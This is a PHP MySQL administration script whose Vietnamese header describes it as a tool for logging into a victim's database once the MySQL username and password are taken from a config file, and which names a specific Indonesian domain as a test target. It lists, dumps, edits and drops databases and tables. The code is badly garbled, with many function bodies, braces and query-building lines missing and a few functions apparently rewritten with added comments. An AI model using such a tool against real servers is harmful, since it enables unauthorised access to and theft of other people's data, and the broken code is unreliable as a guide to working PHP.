<?
/*
www.iconpln.co.id
test webapps
* -------------------------------
* Description :
* Dùng để login vào CSDL của victim khi đã biết user và pass của MySQL thông qua file config
* (English: used to log in to the victim's database once the MySQL username and password are
*  known from a config file. Note: logon() below clears cookies named mysql_web_admin_username and
*  mysql_web_admin_password, which suggests the DB credentials are carried in browser cookies —
*  confirm against the full source before relying on this.)
*/
$HOSTNAME = "localhost";
function logon() {
global $PHP_SELF;
setcookie( "mysql_web_admin_username" );
setcookie( "mysql_web_admin_password" );
echo "<html>\n";
echo "<head>\n";
echo "</head>\n";
echo "<body>\n";
echo "</table><p>\n";
echo "</form>\n";
echo "</center></td></tr></table>\n";
echo "</center></td></tr></table>\n";
echo "</font>\n";
echo "</center></td></tr></table>\n";
echo "</body>\n";
echo "</html>\n";
function logon_submit() {
    // Emits the bare HTML shell returned after the logon form is submitted.
    // In this copy the function carries no body markup and no credential
    // handling, so the cookie/credential flow cannot be reviewed from here.
    // The tags are printed back-to-back with no line breaks, exactly as the
    // original did.
    $shell = array( '<html>', '<head>', '</head>', '</html>' );
    foreach( $shell as $tag ) {
        print $tag;
    }
}
function echoQueryResult() {
echo "<tr><td>Query</td><td>$queryStr</td></tr>\n";
echo "<tr><td>Result</td><td>$errMsg</td></tr>\n";
echo "</table><p>\n";
function listDatabases() {
echo "</form>\n";
echo "<hr>\n";
echo "<tr>\n";
echo "<td>$dbname</td>\n";
echo "</tr>\n";
echo "</table>\n";
function createDatabase() {
listDatabases();
function dropDatabase() {
listDatabases();
function listTables() {
global $mysqlHandle, $dbname, $PHP_SELF;
echoQueryResult();
echo "</form>\n";
echo "</form>\n";
echo "<hr>\n";
if( $pTable == 0 ) {
$msg = mysql_error();
return;
echo "<tr>\n";
echo "<td>\n";
echo "$tablename\n";
echo "</td>\n";
echo "<td>\n";
echo "<a
href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
echo "</td>\n";
echo "<td>\n";
echo "<a
href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>Data</a>\n";
echo "</td>\n";
echo "<td>\n";
echo "</td>\n";
echo "<td>\n";
echo "<a
href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename'>Dump</a>\n";
echo "</td>\n";
echo "</tr>\n";
echo "</table>";
}
function createTable() {
$errMsg = mysql_error();
listTables();
function dropTable() {
$errMsg = mysql_error();
listTables();
function viewSchema() {
echo "<hr>\n";
echo "<tr>\n";
echo "<th>Field</th>\n";
echo "<th>Type</th>\n";
echo "<th>Null</th>\n";
echo "<th>Key</th>\n";
echo "<th>Default</th>\n";
echo "<th>Extra</th>\n";
echo "</tr>\n";
echo "<tr>\n";
echo "<td>".$field["Field"]."</td>\n";
echo "<td>".$field["Type"]."</td>\n";
echo "<td>".$field["Null"]."</td>\n";
echo "<td>".$field["Key"]."</td>\n";
echo "<td>".$field["Default"]."</td>\n";
echo "<td>".$field["Extra"]."</td>\n";
$fieldname = $field["Field"];
echo "<td><a
href='$PHP_SELF?action=editField&dbname=$dbname&tablename=$tablename&fieldname=$fieldnam
e'>Edit</a></td>\n";
echo "<td><a
href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename&fieldname=$fieldnam
e' onClick=\"return confirm('Drop Field \'$fieldname\'?')\">Drop</a></td>\n";
echo "</tr>\n";
echo "</table>\n";
$fieldtype = $field["Type"];
$fieldkey = $field["Key"];
$fieldextra = $field["Extra"];
$fieldnull = $field["Null"];
$fielddefault = $field["Default"];
break;
} else {
echo "<h3>Name</h3>\n";
echo "<input type=text name=name value=$fieldname><p>\n";
?>
<h3>Type</h3>
<font size=2>
* `D' applies to floating-point types and indicates the number of digits following the decimal point.<br>
</font>
<table>
<tr>
<th>Type</th><th> M </th><th> D </th><th>unsigned</th><th>zerofill</th><th
>binary</th>
</tr>
<tr>
<td align=center>O</td>
<td> </td>
<td align=center>O</td>
<td align=center>O</td>
<td> </td>
</tr>
<tr>
<td align=center>O</td>
<td> </td>
<td align=center>O</td>
<td align=center>O</td>
<td> </td>
</tr>
<tr>
<td align=center>O</td>
<td> </td>
<td align=center>O</td>
<td align=center>O</td>
<td> </td>
</tr>
<tr>
<td><input type=radio name=type value="INT" <? if( $type == "int" ) echo "checked";?>>INT (-
2147483648 ~ 2147483647)</td>
<td align=center>O</td>
<td> </td>
<td align=center>O</td>
<td align=center>O</td>
<td> </td>
</tr>
<tr>
<td><input type=radio name=type value="BIGINT" <? if( $type == "bigint" ) echo "checked";?>>BIGINT (-
9223372036854775808 ~ 9223372036854775807)</td>
<td align=center>O</td>
<td> </td>
<td align=center>O</td>
<td align=center>O</td>
<td> </td>
</tr>
<tr>
<td align=center>O</td>
<td align=center>O</td>
<td> </td>
<td align=center>O</td>
<td> </td>
</tr>
<tr>
<td align=center>O</td>
<td align=center>O</td>
<td> </td>
<td align=center>O</td>
<td> </td>
</tr>
<tr>
<td align=center>O</td>
<td align=center>O</td>
<td> </td>
<td align=center>O</td>
<td> </td>
</tr>
<tr>
<td><input type=radio name=type value="DATE" <? if( $type == "date" ) echo "checked";?>>DATE
(1000-01-01 ~ 9999-12-31, YYYY-MM-DD)</td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr>
<td align=center>O</td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr>
<td><input type=radio name=type value="TIME" <? if( $type == "time" ) echo "checked";?>>TIME (-
838:59:59 ~ 838:59:59, HH:MM:SS)</td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr>
<td><input type=radio name=type value="YEAR" <? if( $type == "year" ) echo "checked";?>>YEAR (1901
~ 2155, 0000, YYYY)</td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr>
<td><input type=radio name=type value="CHAR" <? if( $type == "char" ) echo "checked";?>>CHAR</td>
<td align=center>O</td>
<td> </td>
<td> </td>
<td> </td>
<td align=center>O</td>
</tr>
<tr>
<td align=center>O</td>
<td> </td>
<td> </td>
<td> </td>
<td align=center>O</td>
</tr>
<tr>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr>
<td><input type=radio name=type value="TEXT" <? if( $type == "text" ) echo "checked";?>>TEXT (0 ~
65535)</td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr>
<td><input type=radio name=type value="BLOB" <? if( $type == "blob" ) echo "checked";?>>BLOB (0 ~
65535)</td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr>
</tr>
<tr>
<td><input type=radio name=type value="SET" <? if( $type == "set" ) echo "checked";?>>SET</td>
</tr>
</table>
<table>
<tr>
<td align=center><input type=text size=4 name=M <? if( $M != "" ) echo "value=$M";?>></td>
<td align=center><input type=text size=4 name=D <? if( $D != "" ) echo "value=$D";?>></td>
<td align=center><input type=checkbox name=unsigned value="UNSIGNED" <? if( strpos( $fieldtype,
"unsigned" ) ) echo "checked";?>></td>
<td align=center><input type=checkbox name=binary value="BINARY" <? if( strpos( $fieldtype, "binary" )
) echo "checked";?>></td>
<td align=center><input type=text size=60 name=valuelist <? if( $valuelist != "" ) echo
"value=\"$valuelist\"";?>></td>
</tr>
</table>
<h3>Flags</h3>
<table>
<tr>
<td align=center><input type=checkbox name=not_null value="NOT NULL" <? if( $fieldnull != "YES" )
echo "checked";?>></td>
</tr>
</table>
<p>
<?
echo "</form>\n";
if( $M != "" )
if( $D != "" )
else
} else
$errMsg = mysql_error();
// key change
$keyChange = false;
$primary = "";
$keyChange = true;
else
$keyChange = !$keyChange;
mysql_query( $q );
$queryStr .= "<br>\n" . $q;
mysql_query( $q );
viewSchema();
function dropField() {
$errMsg = mysql_error();
viewSchema();
else
echo "<p class=location>$dbname</p>\n";
echo "<a
href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
$errMsg = mysql_error();
$GLOBALS[queryStr] = $queryStr;
echoQueryResult();
return;
if( $pResult == 1 ) {
$errMsg = "Success";
echoQueryResult();
return;
echo "<hr>\n";
$row = mysql_num_rows( $pResult );
if( $row == 0 ) {
return;
else $page--;
echo "<tr>\n";
echo "<th>";
echo "<a
href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&orderby=".$field-
>name."'>".$field->name."</a>\n";
echo "</th>\n";
echo "</tr>\n";
echo "<tr>\n";
$key = "";
$data = $rowArray[$j];
if( $field->primary_key == 1 )
echo "<td>\n";
echo "$data\n";
echo "</td>\n";
else {
echo "<td><a
href='$PHP_SELF?action=editData&dbname=$dbname&tablename=$tablename$key'>Edit</a></td>\n"
;
echo "</tr>\n";
echo "</table>\n";
echo "<font size=2>\n";
echo "</font>\n";
echo "<a
href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page);
echo "&orderby=$orderby";
echo "'>Prev</a>\n";
} else
echo "Prev";
echo "<a
href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page+2);
echo "&orderby=$orderby";
echo "'>Next</a>\n";
} else
echo "Next";
}
echo "</form>\n";
echo "</font>\n";
$key = "";
if( $field->primary_key == 1 )
if( $field->numeric == 1 )
else
}
echo "<p class=location>$dbname > $tablename</p>\n";
echo "<tr>\n";
echo "<th>Name</th>\n";
echo "<th>Type</th>\n";
echo "<th>Function</th>\n";
echo "<th>Data</th>\n";
echo "</tr>\n";
$fieldname = $field["Field"];
$fieldtype = $field["Type"];
echo "<td>$fieldname</td>";
echo "<td>".$field["Type"]."</td>";
echo "<td>\n";
echo "<option>\n";
echo "<option>ASCII\n";
echo "<option>CHAR\n";
echo "<option>SOUNDEX\n";
echo "<option>CURDATE\n";
echo "<option>CURTIME\n";
echo "<option>FROM_DAYS\n";
echo "<option>FROM_UNIXTIME\n";
echo "<option>NOW\n";
echo "<option>PASSWORD\n";
echo "<option>PERIOD_ADD\n";
echo "<option>PERIOD_DIFF\n";
echo "<option>TO_DAYS\n";
echo "<option>USER\n";
echo "<option>WEEKDAY\n";
echo "<option>RAND\n";
echo "</select>\n";
echo "</td>\n";
$value = htmlspecialchars($data[$i]);
echo "<td>\n";
echo "<option>$str\n";
strtok( "'" );
echo "</select>\n";
echo "</td>\n";
} else {
else
echo "<td>\n";
else
echo "<option>$str\n";
strtok( "'" );
echo "</select>\n";
echo "</td>\n";
} else {
else
echo "</tr>";
echo "</table><p>\n";
echo "</form>\n";
$func = $GLOBALS[$field->name."_function"];
if( $field->numeric == 1 ) {
$queryStr .= $GLOBALS[$field->name];
$queryStr .= "),";
else
$queryStr .= ",";
} else {
$queryStr .= "'),";
else
$queryStr .= "',";
if( $field->numeric == 1 )
else
$errMsg = mysql_error();
viewData( "" );
function deleteData() {
$key = "";
if( $field->primary_key == 1 )
if( $field->numeric == 1 )
else
$errMsg = mysql_error();
viewData( "" );
function dump() {
$filename = $tablename;
else
$filename = $dbname;
header("Content-disposition: filename=$filename.sql");
header("Content-type: application/octetstream");
header("Pragma: no-cache");
header("Expires: 0");
while( 1 ) {
$bindir = $rowArray[1]."bin/";
function utils() {
echo "<hr>\n";
echo "Show\n";
echo "<ul>\n";
echo "</ul>\n";
echo "Flush\n";
echo "<ul>\n";
else
else
else
else
echo "</ul>\n";
} else {
echo "Fail";
return;
echo "<hr>\n";
echo "<table cellspacing=1 cellpadding=2 border=0>\n";
echo "<tr>\n";
echo "<th>".$field->name."</th>\n";
echo "</tr>\n";
while( 1 ) {
echo "<tr>\n";
echo "</tr>\n";
echo "</table>\n";
function header_html() {
global $PHP_SELF;
?>
<html>
<head>
<style type="text/css">
<!--
p.location {
color: #FF6000;
font-size: small;
h1 {
color: #0090FF;
th {
background-color: #34A725;
color: #FFFFFF;
font-size: x-small;
td {
background-color: #5DB1FF;
font-size: x-small;
form {
margin-top: 0;
margin-bottom: 0;
a{
text-decoration:none;
color: #848200;
font-size:x-small;
a:link {
a:hover {
background-color:#EEEFD5;
color:#FF0000;
text-decoration:none
//-->
</style>
</head>
<body>
<?
function footer_html() {
    // Closes the page opened by header_html(): a horizontal rule, then the
    // </font>, </body> and </html> tags, one per line.  The </font> closes a
    // tag opened elsewhere in the page template, not in this function.
    $closing = "<hr>\n"
             . "</font>\n"
             . "</body>\n"
             . "</html>\n";
    print $closing;
}
//------------------------------------------------------ MAIN
logon();
logon_submit();
dump();
} else {
echo "<!--";
echo "-->";
echo "<html>\n";
echo "<head>\n";
echo "</head>\n";
echo "<body>\n";
echo "</center></td></tr></table>\n";
echo "</body>\n";
echo "</html>\n";
} else {
header_html();
listDatabases();
createDatabase();
dropDatabase();
listTables();
createTable();
dropTable();
viewSchema();
viewData( $queryStr );
manageField( "add" );
manageField_submit( "add" );
manageField( "edit" );
else if( $action == "editField_submit" )
manageField_submit( "edit" );
dropField();
viewData( "" );
manageData( "add" );
manageData_submit( "add" );
manageData( "edit" );
manageData_submit( "edit" );
deleteData();
utils();
mysql_close( $mysqlHandle);
footer_html();
?>